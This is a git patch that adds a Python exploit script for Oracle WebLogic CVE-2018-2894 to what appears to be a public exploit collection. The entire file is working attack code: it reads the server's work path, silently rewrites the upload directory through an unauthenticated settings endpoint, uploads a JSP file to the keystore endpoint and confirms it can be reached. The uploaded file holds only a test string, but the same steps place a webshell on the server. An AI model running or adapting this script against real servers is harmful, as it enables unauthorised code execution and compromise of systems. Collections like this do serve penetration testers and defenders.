From 4e1077c25e5bc705a59e11337b9f179d7a814e1d Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Thu, 26 Jul 2018 19:15:53 +0200
Subject: [PATCH] Weblogic RCE CVE 2018 2894

---
 CVE Exploits/Weblogic CVE-2018-2894.py | 126 +++++++++++++++++++++++++
 1 file changed, 126 insertions(+)
 create mode 100644 CVE Exploits/Weblogic CVE-2018-2894.py

diff --git a/CVE Exploits/Weblogic CVE-2018-2894.py b/CVE Exploits/Weblogic CVE-2018-2894.py
new file mode 100644
index 0000000..0fd904a
--- /dev/null
+++ b/CVE Exploits/Weblogic CVE-2018-2894.py	
@@ -0,0 +1,126 @@
+#!/usr/bin/env python
+# coding:utf-8
+# Build By LandGrey
+
+import re
+import sys
+import time
+import argparse
+import requests
+import traceback
+import xml.etree.ElementTree as ET
+
+
+def get_current_work_path(host):
+    geturl = host + "/ws_utc/resources/setting/options/general"
+    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
+    values = []
+    try:
+        request = requests.get(geturl)
+        if request.status_code == 404:
+            exit("[-] {}  don't exists CVE-2018-2894".format(host))
+        elif "Deploying Application".lower() in request.text.lower():
+            print("[*] First Deploying Website Please wait a moment ...")
+            time.sleep(20)
+            request = requests.get(geturl, headers=ua)
+        if "</defaultValue>" in request.content:
+            root = ET.fromstring(request.content)
+            value = root.find("section").find("options")
+            for e in value:
+                for sub in e:
+                    if e.tag == "parameter" and sub.tag == "defaultValue":
+                        values.append(sub.text)
+    except requests.ConnectionError:
+        exit("[-] Cannot connect url: {}".format(geturl))
+    if values:
+        return values[0]
+    else:
+        print("[-] Cannot get current work path\n")
+        exit(request.content)
+
+
+def get_new_work_path(host):
+    origin_work_path = get_current_work_path(host)
+    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
+    if "user_projects" in origin_work_path:
+        if "\\" in origin_work_path:
+            works = works.replace("/", "\\")
+            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
+            dir_len = len(current_work_home.split("\\"))
+            domain_name = origin_work_path.split("\\")[dir_len]
+            current_work_home += "\\" + domain_name + works
+        else:
+            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
+            dir_len = len(current_work_home.split("/"))
+            domain_name = origin_work_path.split("/")[dir_len]
+            current_work_home += "/" + domain_name + works
+    else:
+        current_work_home = origin_work_path
+        print("[*] cannot handle current work home dir: {}".format(origin_work_path))
+    return current_work_home
+
+
+def set_new_upload_path(host, path):
+    data = {
+        "setting_id": "general",
+        "BasicConfigOptions.workDir": path,
+        "BasicConfigOptions.proxyHost": "",
+        "BasicConfigOptions.proxyPort": "80"}
+    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
+    if "successfully" in request.content:
+        return True
+    else:
+        print("[-] Change New Upload Path failed")
+        exit(request.content)
+
+
+def upload_webshell(host, uri):
+    set_new_upload_path(host, get_new_work_path(host))
+    files = {
+        "ks_edit_mode": "false",
+        "ks_password_front": password,
+        "ks_password_changed": "true",
+        "ks_filename": ("360sglab.jsp", upload_content)
+    }
+
+    request = requests.post(host + uri, files=files)
+    response = request.text
+    match = re.findall("<id>(.*?)</id>", response)
+    if match:
+        tid = match[-1]
+        shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
+        if upload_content in requests.get(shell_path, headers=headers).content:
+            print("[+] {} exists CVE-2018-2894".format(host))
+            print("[+] Check URL: {} ".format(shell_path))
+        else:
+            print("[-] {}  don't exists CVE-2018-2894".format(host))
+    else:
+        print("[-] {}  don't exists CVE-2018-2894".format(host))
+
+
+if __name__ == "__main__":
+    start = time.time()
+    password = "360sglab"
+    url = "/ws_utc/resources/setting/keystore"
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
+                        help="target, such as: http://example.com:7001")
+
+    upload_content = "360sglab test"
+    headers = {
+        'Content-Type': 'application/x-www-form-urlencoded',
+        'X-Requested-With': 'XMLHttpRequest', }
+
+    if len(sys.argv) == 1:
+        sys.argv.append('-h')
+    args = parser.parse_args()
+    target = args.target
+
+    target = target.rstrip('/')
+    if "://" not in target:
+        target = "http://" + target
+    try:
+        upload_webshell(target, url)
+    except Exception as e:
+        print("[-] Error: \n")
+        traceback.print_exc()